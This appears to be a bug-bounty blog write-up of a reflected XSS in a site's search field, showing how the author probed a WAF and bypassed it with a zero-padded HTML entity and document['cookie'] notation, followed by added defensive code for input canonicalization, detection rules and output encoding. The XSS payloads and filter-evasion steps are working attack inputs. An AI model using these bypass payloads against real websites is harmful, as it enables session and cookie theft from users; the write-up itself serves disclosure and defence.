Hi! In this article I want to share my finding of a reflected XSS and one way of bypassing a 403 Forbidden response from the WAF.
Firstly, what is an XSS vulnerability?
XSS (Cross Site Scripting)
XSS or Cross Site Scripting is a client-side web vulnerability where the attacker is able to inject malicious code into the victim's browser, usually via an input field (like a search box or another form field). An attacker can steal the victim's cookies or data, or even the session, so the attacker can log in as the victim without needing to authenticate (worst case).
In my case, the vulnerability occurs in the search field. There is no filter on the “<>” characters in user input, so the field can basically be filled with HTML or JavaScript code, which is then executed as HTML injection or JavaScript injection (XSS). But even so, I found that some patterns or characters were forbidden, since they led to a 403 Forbidden status.
My first payload was: testtest”+onmouseover%3D”alert(1) and it got blocked by the WAF (403 Forbidden).
Then I tried to analyze which letter/character/pattern was actually blocked and forbidden by the WAF. So I tried it step by step:
testtest”+onmouseover → 200 ok
testtest”+onmouseover%3D → 200 ok
testtest”+onmouseover%3D”alert → 200 ok, and so on (this is one of my classic techniques when trying to bypass :D )
Until I found the character that got my payload blocked: it is the “(” character, used when I open the argument of the alert call. It looks like:
testtest”+onmouseover%3D”alert(1) → 403 forbidden, blocked by WAF
but testtest”+onmouseover%3D”alert1) → 200 ok, still fine :D
So, I tried to bypass the “(” character with a numeric HTML entity, replacing “(” with &#40;
**NB : You can check the HTML entities for other characters at https://tools.w3cub.com/html-entities
testtest”+onmouseover%3D”alert&#40;1) → invalid payload, because the text after the “&” character is ignored or removed (an unencoded “&” is treated as the separator of the next query-string parameter)
Then I tried to URL-encode the &#40; entity:
testtest”+onmouseover%3D”alert%26%2340%3B1) → 403 forbidden, blocked by WAF
**You can use this site for URL encoding: https://www.urlencoder.io/
Then I remembered a write-up about bypassing a WAF for XSS by adding “00” or “%00” in the middle of the payload, so I modified the payload again:
testtest”+onmouseover%3D”alert%26%230040%3B1) → still blocked
testtest”+onmouseover%3D”alert%26%230000000040%3B1) → 200 ok (Nice…)
Finally, I bypassed it after adding “0” eight times (8x), as in the payload above.
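The sequence above shows a WAF that decodes percent-encoding and short numeric references (both &#40; and &#040; were blocked) but apparently not a reference padded with more zeros, while the browser decodes all of them to the same “(”. A check on the defender's side should canonicalize the parameter the way the browser will interpret it, and only then match. The following is an added example written for this post, not the affected site's WAF or any vendor's code; it goes a bit beyond the post by also handling hex and named references and double encoding. Function names and the rule list are assumptions made for the illustration.

```javascript
// Added example, not the site's WAF: canonicalize a query parameter the way
// a browser will interpret it, then run detection rules on that canonical
// form. Function names and the rule list are assumptions for illustration.

// Percent-decoding with '+' as space (form encoding). On malformed input,
// decode the ASCII-range sequences anyway so a stray "%" cannot switch
// decoding off for the whole value.
function urlDecode(s) {
  const spaced = s.replace(/\+/g, ' ');
  try {
    return decodeURIComponent(spaced);
  } catch (e) {
    return spaced.replace(/%([0-7][0-9a-fA-F])/g, (m, h) => String.fromCharCode(parseInt(h, 16)));
  }
}

// Named references only decode with a trailing semicolon; this small map
// covers the characters that matter in attribute context.
const NAMED = { lpar: '(', rpar: ')', quot: '"', apos: "'", amp: '&', lt: '<', gt: '>' };

// HTML character references. A browser accepts hex or decimal, any number of
// leading zeros ("&#40;", "&#040;" and "&#0000000040;" are all "(") and, for
// numeric forms, a missing semicolon. Capping the digit count is exactly the
// gap the zero-padded payload above went through.
function decodeEntities(s) {
  return s.replace(/&#[xX]([0-9a-fA-F]+);?|&#([0-9]+);?|&([a-zA-Z]+);/g, (m, hex, dec, name) => {
    if (name !== undefined) {
      return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : m;
    }
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m; // impossible code points stay as text
  });
}

// Repeat until the value stops changing (bounded), which also unwraps
// double encoding such as "%2526%252340%253B".
function canonicalize(raw, maxRounds = 3) {
  let cur = raw;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodeEntities(urlDecode(cur));
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Rules run on the canonical form only; returns the names of the rules hit.
const RULES = [
  { name: 'event-handler-attribute', re: /\bon[a-z]+\s*=/i },
  { name: 'script-tag', re: /<\s*script\b/i },
  { name: 'js-function-call', re: /\b(?:alert|prompt|confirm|eval)\s*\(/i },
];
function matchedRules(raw) {
  const canon = canonicalize(raw);
  return RULES.filter((r) => r.re.test(canon)).map((r) => r.name);
}

// Constructed inputs modelled on the post's payloads plus an ordinary search.
const SAMPLES = [
  'testtest"+onmouseover%3D"alert%26%2340%3B1)',
  'testtest"+onmouseover%3D"alert%26%230040%3B1)',
  'testtest"+onmouseover%3D"alert%26%230000000040%3B1)',
  'shoes+size+10',
];
for (const s of SAMPLES) {
  console.log(JSON.stringify(canonicalize(s)), '->', matchedRules(s));
}
```

All three encoded payloads canonicalize to the same string and hit the same rules, so the padding no longer matters. The rule list is deliberately small and will have false positives on ordinary text (a search for “online=true” hits the first rule), which is one reason this kind of matching is a secondary layer and not a replacement for encoding the reflected value in the page.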
Then I tried to access document.cookie, but the text “document.cookie” in the payload was removed by the site, so it looks like there is another security mechanism.
testtest”+onmouseover%3D”alert%26%230000000040%3Bdocument.cookie) → 200 ok, but…
it became:
testtest” onmouseover=”alert([removed])
So I modified the payload again by changing document.cookie to document[‘cookie’]:
testtest”+onmouseover%3D”alert%26%230000000040%3Bdocument[‘cookie’]) → 200 ok and the payload was triggered
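The “[removed]” substitution above is a keyword filter, and document[‘cookie’] shows why such filters do not hold: the browser evaluates the same property either way. The fix that does hold is contextual output encoding of the reflected search term, so that no input can end the attribute value in the first place. Below is an added example written for this post, not code from the affected site: a minimal search-page renderer in its vulnerable and hardened forms. The function names and the markup are assumptions made for the illustration.

```javascript
// Added example, not code from the original post or the affected site.
// A minimal search-results renderer: the vulnerable form reflects the term
// as-is, the hardened form applies contextual HTML encoding. Function names
// and the markup are assumptions made for this illustration.

// Vulnerable: the term is interpolated straight into an attribute value and
// into the page body, so a `"` in the term ends the value and whatever
// follows is parsed as new attributes (the onmouseover handler in the post).
function renderSearchVulnerable(term) {
  return `<input name="q" value="${term}"><p>Results for ${term}</p>`;
}

// Encode the five characters that can change structure in HTML text and in
// double-quoted attribute values. `&` is replaced in the same pass, so the
// entities this function emits are never re-encoded.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Hardened: the term stays inside the attribute value and inside the <p>
// whatever it contains. No keyword list is involved, so spelling the
// property as document['cookie'] instead of document.cookie changes nothing.
function renderSearchHardened(term) {
  const safe = escapeHtml(term);
  return `<input name="q" value="${safe}"><p>Results for ${safe}</p>`;
}

// Constructed probe with the shape used in the post (already URL-decoded).
const PROBE = 'testtest" onmouseover="alert(document[\'cookie\'])';

// The page was broken out of when a raw onmouseover="..." attribute appears
// in the markup; in the hardened output the quotes are &quot; instead.
function hasInjectedHandler(html) {
  return /\sonmouseover="/i.test(html);
}

// Reads back what the browser sees as the `value` attribute: the vulnerable
// output is truncated at the injected quote, the hardened output carries the
// whole term in encoded form.
function reflectedValue(html) {
  const m = /value="([^"]*)"/.exec(html);
  return m ? m[1] : null;
}

console.log(renderSearchVulnerable(PROBE));
console.log(renderSearchHardened(PROBE));
console.log('handler injected:', hasInjectedHandler(renderSearchVulnerable(PROBE)),
            hasInjectedHandler(renderSearchHardened(PROBE)));
```

With the hardened renderer the whole term stays inside value="…", and the WAF becomes a secondary layer rather than the only control. Marking the session cookie HttpOnly additionally keeps it out of reach of document.cookie even where a script does run.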
Thank you.